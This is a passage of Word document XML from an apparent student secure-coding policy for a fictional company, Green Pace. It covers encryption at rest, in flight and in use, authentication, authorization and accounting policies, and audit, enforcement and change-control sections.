          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="36B5D62C" w14:textId="6675F36C" w:rsidR="00381847" w:rsidRDefault="00350538">
            <w:r>
              <w:t>P12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="78E62A20" w14:textId="55DFC2E6" w:rsidR="00381847" w:rsidRDefault="000C5DDF">
            <w:r>
              <w:t>L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="1A8BA019" w14:textId="77777777" w:rsidTr="00192176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="44647100" w14:textId="1AFEF5C4" w:rsidR="00381847" w:rsidRDefault="00F92EBA">
            <w:r>
              <w:t>CTR</w:t>
            </w:r>
            <w:r w:rsidR="001C5112">
              <w:t>-050-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="5C4FF30D" w14:textId="0DECE0C3" w:rsidR="00381847" w:rsidRDefault="001C5112">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="022C22B4" w14:textId="5A7C4153" w:rsidR="00381847" w:rsidRDefault="001C5112">
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="723BF2DC" w14:textId="22A376C8" w:rsidR="00381847" w:rsidRDefault="001C5112">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="00E0C6DB" w14:textId="39D966E1" w:rsidR="00381847" w:rsidRDefault="001C5112">
            <w:r>
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="4A397D60" w14:textId="1B99A486" w:rsidR="00381847" w:rsidRDefault="00C84CC2">
            <w:r>
              <w:t>L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="065B3FB5" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="75A7A4D8" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc52464076"/>
      <w:r>
        <w:t>Create Policies for Encryption and Triple A</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6BE51C" w14:textId="3666D736" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="54BB6B49">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Int_Qb9940B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bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="354139B7" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="008D5A8D">
      <w:pPr>
        <w:pStyle w:val="List"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Int_UZcJlbyI"/>
      <w:r>
        <w:t>Explain each type of encryption, how it is used, and why and when the policy applies.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="224FF374" w14:textId="5612E759" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="008D5A8D">
      <w:pPr>
        <w:pStyle w:val="List"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Int_KP14w3jv"/>
      <w:r>
        <w:t>Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="2E421E78" w14:textId="77777777" w:rsidR="008C3FC6" w:rsidRDefault="008C3FC6" w:rsidP="008C3FC6">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3478FBBD" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:bookmarkStart w:id="49" w:name="_Int_CcWS8PkN"/>
      <w:r>
        <w:t xml:space="preserve">Write policies for each and explain what </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, how it should be applied in practice, and why it should be used.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="205E4EEA" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4DCCC24C" w14:textId="01E4C443" w:rsidR="00381847" w:rsidRDefault="00F143A9">
            <w:r>
              <w:t>Encryption at rest is</w:t>
            </w:r>
            <w:r w:rsidR="003B639D">
              <w:t xml:space="preserve"> encrypting data that is stored in a database</w:t>
            </w:r>
            <w:r w:rsidR="00124BA3">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="001971D5">
              <w:t>In order to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="001971D5">
              <w:t xml:space="preserve"> do </w:t>
            </w:r>
            <w:r w:rsidR="00AE518E">
              <w:t>this,</w:t>
            </w:r>
            <w:r w:rsidR="001971D5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009503DE">
              <w:t xml:space="preserve">we will encrypt all personal and sensitive data before it is sent to the database and </w:t>
            </w:r>
            <w:r w:rsidR="00AE518E">
              <w:t>ensure that the key is stored in a separate server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="0F67A9AE" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3C6BD218" w14:textId="700144B3" w:rsidR="00381847" w:rsidRDefault="003911BD">
            <w:r>
              <w:t xml:space="preserve">Encryption in flight, also known as encryption in transit, refers to the protection of data as it travels across networks, whether it's between clients and servers, between servers, or within a network. To do this we will </w:t>
            </w:r>
            <w:r w:rsidR="00C9290F">
              <w:t>use a combination of TSL</w:t>
            </w:r>
            <w:r w:rsidR="008674A9">
              <w:t xml:space="preserve"> and HTTPS to ensure the data is </w:t>
            </w:r>
            <w:r w:rsidR="001024DA">
              <w:t>encrypted</w:t>
            </w:r>
            <w:r w:rsidR="008674A9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001024DA">
              <w:t xml:space="preserve">while in </w:t>
            </w:r>
            <w:r w:rsidR="00322AA2">
              <w:t>transit and</w:t>
            </w:r>
            <w:r w:rsidR="007D568B">
              <w:t xml:space="preserve"> use a trusted Certificate Authorities</w:t>
            </w:r>
            <w:r w:rsidR="003812EF">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="0D41AF4D" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1905" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>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EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E62DFA0" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00321469">
            <w:r>
              <w:t xml:space="preserve">Encryption is use is </w:t>
            </w:r>
            <w:r w:rsidR="009C4FCD">
              <w:t xml:space="preserve">the practice of not saving decrypted values while using them for calculations or other uses. </w:t>
            </w:r>
            <w:r w:rsidR="00322AA2">
              <w:t xml:space="preserve">If you needed to </w:t>
            </w:r>
            <w:r w:rsidR="00911A3E">
              <w:t>print a variable to screen for instance you would not do this:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689C2B00" w14:textId="77777777" w:rsidR="000713B9" w:rsidRDefault="000713B9"/>
          <w:p w14:paraId="34351AF7" w14:textId="08C42A6C" w:rsidR="00911A3E" w:rsidRDefault="00911A3E">
            <w:r>
              <w:t xml:space="preserve">Int </w:t>
            </w:r>
            <w:r w:rsidR="004B4B83">
              <w:t>display</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004B4B83">
              <w:t>= decrypt(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004B4B83">
              <w:t>sensitiveInformation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="004B4B83">
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="68B93F3E" w14:textId="77777777" w:rsidR="004B4B83" w:rsidRDefault="000713B9">
            <w:r>
              <w:t xml:space="preserve">Cout &lt;&lt; display &lt;&lt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>endl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="11B285D0" w14:textId="77777777" w:rsidR="000713B9" w:rsidRDefault="000713B9"/>
          <w:p w14:paraId="02356FB7" w14:textId="77777777" w:rsidR="000713B9" w:rsidRDefault="000713B9">
            <w:r>
              <w:t xml:space="preserve">This saves the </w:t>
            </w:r>
            <w:r w:rsidR="008D7EB9">
              <w:t xml:space="preserve">sensitive information in a variable that persists until the program ends </w:t>
            </w:r>
            <w:r w:rsidR="00B52B29">
              <w:t>or is reassigned. A better way is like this:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C126083" w14:textId="77777777" w:rsidR="00B52B29" w:rsidRDefault="00B52B29"/>
          <w:p w14:paraId="07B9FCAE" w14:textId="77777777" w:rsidR="00B52B29" w:rsidRDefault="00B52B29">
            <w:r>
              <w:t>Cout &lt;&lt; decrypt(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sensitiveInfor</w:t>
            </w:r>
            <w:r w:rsidR="006C5345">
              <w:t>mation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="006C5345">
              <w:t xml:space="preserve">) &lt;&lt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="006C5345">
              <w:t>endl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="006C5345">
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0F72AA8A" w14:textId="77777777" w:rsidR="00D52BD3" w:rsidRDefault="00D52BD3"/>
          <w:p w14:paraId="70DDEFB4" w14:textId="3C185042" w:rsidR="00E62703" w:rsidRDefault="00E62703">
            <w:r>
              <w:t>If a calculation needs to be saved to a variable encrypt i</w:t>
            </w:r>
            <w:r w:rsidR="0047469E">
              <w:t>t inline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BEEC775" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847">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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="08A5E450" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8706" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="606E07DB" w14:textId="77C095C1" w:rsidR="009A025A" w:rsidRDefault="009A025A">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Authentication verifies the identity of a user or system attempting to access resources. It ensures that the entity requesting access is indeed who or what it claims to be.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B8F4F4" w14:textId="586CC929" w:rsidR="00381847" w:rsidRDefault="00B241C3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>User Logins</w:t>
            </w:r>
            <w:r>
              <w:t>: Require strong authentication mechanisms such as passwords, multi-factor authentication (MFA), or biometric verification.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD9E862" w14:textId="77777777" w:rsidR="00B241C3" w:rsidRDefault="006211A5">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Addition of New Users</w:t>
            </w:r>
            <w:r>
              <w:t>: Implement procedures for securely adding new users, including identity verification and assigning appropriate credentials.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F347F24" w14:textId="1FF39F66" w:rsidR="006211A5" w:rsidRDefault="00CD288B">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Access Control</w:t>
            </w:r>
            <w:r>
              <w:t>: Enforce authentication before granting access to any system or data resource to prevent unauthorized access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="648E56BD" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6D12B718" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8706" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="76298669" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="004A155D">
            <w:r>
              <w:t>Authorization determines what actions and resources users are permitted to access after they have been authenticated. It enforces policies that dictate the level of access granted based on the user’s identity and role.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D5CABDB" w14:textId="77777777" w:rsidR="004A155D" w:rsidRDefault="00147DA7">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>User Level of Access</w:t>
            </w:r>
            <w:r>
              <w:t>: Define roles and permissions that restrict access to specific resources based on the principle of least privilege.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCC17F0" w14:textId="77777777" w:rsidR="00147DA7" w:rsidRDefault="00147DA7">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Files Accessed by Users</w:t>
            </w:r>
            <w:r>
              <w:t>: Implement access controls to ensure that users can only access files and data necessary for their tasks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="020713C6" w14:textId="10D3F630" w:rsidR="00147DA7" w:rsidRDefault="0099094A">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Changes to the Database</w:t>
            </w:r>
            <w:r>
              <w:t>: Authorize database modifications based on roles and responsibilities, ensuring that only authorized personnel can alter or delete data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="2E1CA022" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="43A27943" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>Accounting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8706" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C833553" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="004A155D">
            <w:r>
              <w:t>Accounting tracks and logs actions performed by users, providing a record of activities for security monitoring, auditing, and compliance purposes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B6B6741" w14:textId="713B6910" w:rsidR="006A41BF" w:rsidRDefault="006A41BF">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>User Actions</w:t>
            </w:r>
            <w:r>
              <w:t>: Monitor and log user actions such as login attempts, failed access attempts, and successful access to sensitive information.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6750781C" w14:textId="6664A7CF" w:rsidR="0099094A" w:rsidRDefault="0099094A">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Changes to the Database</w:t>
            </w:r>
            <w:r>
              <w:t>: Log modifications made to the database, including updates, inserts, and deletions, to maintain an audit trail.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B12DFB3" w14:textId="73A3D6AB" w:rsidR="0099094A" w:rsidRDefault="0099094A">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Files Accessed by Users</w:t>
            </w:r>
            <w:r>
              <w:t>: Record which files each user accesses, when, and from where, to detect and investigate unauthorized activities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B38047B" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="4F10AB23" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:pPr>
        <w:ind w:left="810"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Int_eoHrRuMz"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>Use this checklist for the Triple A to be sure you include these elements in your policy:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>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51" w:name="_Toc52464077"/>
      <w:r>
        <w:t>Map the Principles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4AA3D0" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="54BB6B49">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Int_Ryd6k4Iv"/>
      <w:r>
        <w:t xml:space="preserve">Map the principles to each of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>standards, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> provide a justification for the connection between the two.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:t xml:space="preserve"> In the Module Three milestone, you added definitions for each of the 10 principles provided. Now it’s time to connect the standards to principles to show how they are supported by principles. </w:t>
      </w:r>
      <w:bookmarkStart w:id="53" w:name="_Int_YZz9zC6m"/>
      <w:r>
        <w:t>You may have more than one principle for each standard, and the principles may be used more than once.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:t xml:space="preserve"> Principles are numbered 1 through 10. </w:t>
      </w:r>
      <w:bookmarkStart w:id="54" w:name="_Int_ViOSgwGD"/>
      <w:r>
        <w:t xml:space="preserve">You will list the number or numbers that apply to each </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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bookmarkEnd w:id="54"/>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bookmarkStart w:id="55" w:name="_Int_wkYPZahO"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The only item you must complete beyond this point is the Policy Version History table.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>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56" w:name="_Toc52464078"/>
      <w:r>
        <w:t>Audit Controls and Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="5F34804D" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:bookmarkStart w:id="57" w:name="_Int_9xP0OoE9"/>
      <w:r>
        <w:t>Every software development effort must be able to provide evidence of compliance for each software deployed into any Green Pace managed environment.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>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bookmarkStart w:id="58" w:name="_Int_bFzerBXF"/>
      <w:r>
        <w:t>Well-documented data-control standards defining the expected security posture of data at rest, in flight, and in use</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="4347934A" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="008D5A8D">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Int_hwCUc3ZZ"/>
      <w:r>
        <w:t>Historical evidence of sustained practice (emails, logs, audits, meeting notes)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>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60" w:name="_Toc52464079"/>
      <w:r>
        <w:t>Enforcement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="03628354" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:bookmarkStart w:id="61" w:name="_Int_HLMciRc8"/>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bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="7554EE07" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="563C6B71" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:bookmarkStart w:id="62" w:name="_Int_IgFbk4pR"/>
      <w:r>
        <w:t>Staff members, consultants, or employees found in violation of this policy will be subject to disciplinary action, up to and including termination.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="66F2B347" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="07D493D9" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc52464080"/>
      <w:r>
        <w:t>Exceptions Process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="01389246" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:bookmarkStart w:id="64" w:name="_Int_DZsuqV5Y"/>
      <w:r>
        <w:t>Any exception to the standards in this policy must be requested in writing with the following information:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>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bookmarkStart w:id="65" w:name="_Int_wHkG857T"/>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bookmarkEnd w:id="65"/>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66" w:name="_Toc52464081"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Distribution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="5E732CE4" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:bookmarkStart w:id="67" w:name="_Int_cUGXCjMc"/>
      <w:r>
        <w:t>This policy is to be distributed to all Green Pace IT staff annually. All IT staff will need to certify acceptance and awareness of this policy annually.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="038E02EB" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="7A12ADE9" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc52464082"/>
      <w:r>
        <w:t>Policy Change Control</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="39A6BADB" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:bookmarkStart w:id="69" w:name="_Int_83QwqFDB"/>
      <w:r>
        <w:t>This policy will be automatically reviewed annually, no later than 365 days from the last revision date. Further, it will be reviewed in response to regulatory or compliance changes, and on demand as determined by the OCISO.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="4C5B3D19" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="6343C43E" w14:textId="0280F5A0" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc52464083"/>
      <w:r>
        <w:t>Policy Version History</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="285BB13A"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tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>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rsidTr="00E54E9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1345" w:type="dxa"/>
